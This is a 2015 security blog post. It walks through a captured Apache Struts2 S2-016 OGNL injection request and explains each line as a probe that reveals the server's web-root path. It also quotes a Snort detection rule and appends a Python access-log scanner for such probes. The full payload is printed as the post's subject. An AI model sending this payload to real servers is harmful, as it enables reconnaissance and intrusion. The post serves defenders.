Thursday, March 26, 2015

Apache Struts2 Remote Code Execution Walkthrough

I recently posted notes on an Apache Struts2 Remote Code Execution attempt

Here's the guts of the attack:

GET /How.do?redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()}

But what is it doing? Let's walk through it in a bit more detail.

Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications.

Back in 2013 it was disclosed that Apache Struts 2.0.0 through 2.3.15 allowed remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix (S2-016, CVE-2013-2251).

In this example we see the vulnerable 'redirect:' prefix being used.

GET /How.do?redirect:

Request to a Java servlet on an Apache Tomcat server that the attacker hopes is running an old Struts version vulnerable to the redirect: prefix code-execution issue

${
#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),


Get this web request's Response object so the attacker can tweak its settings

#res.setCharacterEncoding("UTF-8"),

Set the response character encoding to UTF-8 so the output comes back readable

#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

Get this web request's Request object so the attacker can read what it carries (here, the session and servlet context)

#res.getWriter().print("dir:"),
#res.getWriter().println(
#req.getSession().getServletContext().getRealPath("/")
),
#res.getWriter().flush(),
#res.getWriter().close()}


Instead of letting the action redirect, write "dir:" followed by the absolute path on disk where the Tomcat server is hosting the web application files into the response, then flush and close it

Summary: This attack is not actually doing anything except validating whether they've found a vulnerable victim server. Odds are that this is an automated bot scanning the internet for victims, and if the bot gets a response back (like the absolute path on disk where Tomcat is running) then it will immediately send another, more malicious request that drops a persistent payload to compromise the server.

Keep your software versions up-to-date.

FYI - This is the Snort rule that catches this attempt:
SERVER-APACHE Apache Struts2 blacklisted method redirect (1:29748)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-APACHE Apache Struts2 blacklisted method redirect"; flow:to_server,established; content:".do?redirect|3A|"; fast_pattern:only; http_uri; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop, service http; reference:cve,2013-2248; reference:cve,2013-2251; reference:url,struts.apache.org/release/2.3.x/docs/s2-016.html; reference:url,struts.apache.org/release/2.3.x/docs/s2-017.html; classtype:web-application-attack; sid:29748; rev:1; )
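As an added example (not code from the original post), here is a small Python access-log scanner that flags S2-016 style probes by the same signal the advisory describes: a query parameter whose name starts with action:, redirect: or redirectAction:. Unlike the single Snort content match above (`.do?redirect|3A|`), it URL-decodes the parameter name first and is not tied to the .do extension or to the redirect: form alone. The log lines are constructed (RFC 5737 test addresses) and their OGNL bodies are truncated to "...".

```python
"""Flag Struts2 S2-016 style probes in web-server access logs (added example)."""
import re
from urllib.parse import unquote

# Parameter-name prefixes that Struts 2.0.0 - 2.3.15 evaluated as OGNL (S2-016).
STRUTS_PREFIXES = ("action:", "redirect:", "redirectaction:")

# Common Log Format: client ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Constructed sample lines; OGNL bodies are truncated to '...'.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Mar/2015:10:14:02 +0000] "GET /How.do?page=2 HTTP/1.1" 200 512',
    '203.0.113.9 - - [26/Mar/2015:10:14:05 +0000] "GET /How.do?redirect:${%23req%3D...} HTTP/1.1" 200 61',
    '198.51.100.4 - - [26/Mar/2015:10:15:11 +0000] "GET /Login.action?redirectAction%3A%24%7B...%7D HTTP/1.1" 200 77',
    '198.51.100.5 - - [26/Mar/2015:10:15:40 +0000] "GET /Help.do?q=1&action%3A%24%7B...%7D=x HTTP/1.1" 404 0',
]


def struts_prefixes_in_target(target: str) -> list[str]:
    """Return the decoded parameter names (prefix only) that carry an S2-016 prefix."""
    query = target.partition("?")[2]
    hits = []
    for param in query.split("&"):
        # Decode before matching so 'redirect%3A' is treated like 'redirect:'.
        name = unquote(param.split("=", 1)[0])
        if name.lower().startswith(STRUTS_PREFIXES):
            # Keep 'redirect:' etc. for triage; drop the OGNL body after ${ or %{.
            hits.append(re.split(r"[$%]\{", name, maxsplit=1)[0])
    return hits


def scan_access_log(lines) -> list[tuple[str, str, list[str]]]:
    """Return (client_ip, request_target, prefixes) for each line that looks like a probe."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not CLF; a real deployment would count these separately
        client, _ts, _method, target, _status = m.groups()
        hits = struts_prefixes_in_target(target)
        if hits:
            findings.append((client, target, hits))
    return findings


if __name__ == "__main__":
    for client, target, hits in scan_access_log(SAMPLE_LOG):
        print(f"{client} probed with {', '.join(hits)} -> {target}")
```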

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
